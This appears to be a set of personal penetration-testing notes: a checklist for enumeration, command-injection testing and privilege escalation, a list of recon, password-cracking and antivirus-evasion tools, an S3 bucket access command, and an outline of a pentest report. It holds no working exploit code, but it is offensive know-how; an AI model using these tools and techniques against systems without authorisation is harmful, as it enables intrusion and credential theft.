Notes on pentesting subjects
Enumeration:
- web server directories
- file shares
- CMS
- API endpoints
Exploitation:
- check if API input parameters are injectable eg. ls, cat, sql injection. Use bacticks and quotes!
Privesc:
- check suid/sgid
- check unknown binaries (
ltrace)
Discover - passive recon, includes lots of tools functionality
Recon-ng - deeper dive for discovery
theHarvester - credential harvesting
Maltego
hunter.io - emails from a domain
phonebook.cz - domains, email addresses and URLs from a domain
Clearbit - connect chrome extension for email search from a domain
voilanorbert.com - similar to hunter.io
www.builtwith.com - identify all websites using a particular technology
https://tools.emailhippo.com/ - email verification
https://dehashed.com/ - powerful searching for emails, passwords, usernames, IP's, VIN numbers and more
https://crt.sh/ - certificate based subdomain search, use % as a wildcard e.g %.example.com for all example.com subdomains
OWASP Amass - in-depth network mapping and external asset discovery
Nikto - website scanning
Dirbuster - directory enumeration
Gobuster - enumerate directories, DNS subdomains, S3 buckets, Google Cloud buckets, Virtual Hosts and TFTP servers
WPScan - wordpress site scanner
CMSeek - CMS enumeration
hping3 - packet crafting, port scanning & host discovery
WhatWeb - website scanning
Sublist3r - subdomain enumeration
Mingw32 C compiler
Hyperion - encryption
Veil-Evasion
hashcat
ceWL
crunch
cupp
binwalk
strings
steghide
stegsolve
apksigner
dex2jar
JD-gui
aws s3 - check S3 bucket access aws s3 --endpoint-url http://s3.domain.com ls/ls bucket-name
Describes the goal of the test and offers a high-level overview of the findings.
Background
A description of the purpose of the test and definitions of terms that may be unfamiliar to executives.
Overall posture
An overview of the effectiveness of the test, the issues found amd general issues causing vulnerabilities.
Risk profile
An overall rank of the organisation's security posture compared to similar organizations. You should also includean explanation of the ranking.
General findings
A general synopsis of the findings along with metrics and statistics of the effectiveness of countermeasures deployed.
Reccomendation summary
A high-level overview of the tasks required to remediate the issues discovered in the pentest.
Strategic roadmap
Give the client short- and long-term goals to improve their security posture.
This section offers technical details of the report.
Introduction
An inventory of details such as scope, contacts, etc.
Information gathering
Details of the findings in the information-gathering phase. Of particular interest is the client’s Internet footprint.
Vulnerability assessment
Details of the findings of the vulnerability-analysis phase of the test.
Exploitation/vulnerability verification
Details of the findings from the exploitation phase of the test.
Post exploitation
Details of the findings of the post-exploitation phase of the test.
Risk/exposure
A quantitative description of the risk discovered. This section estimates the loss if the identif i ed vulnerabilities were exploited by an attacker.
Conclusion
A final overview of the test.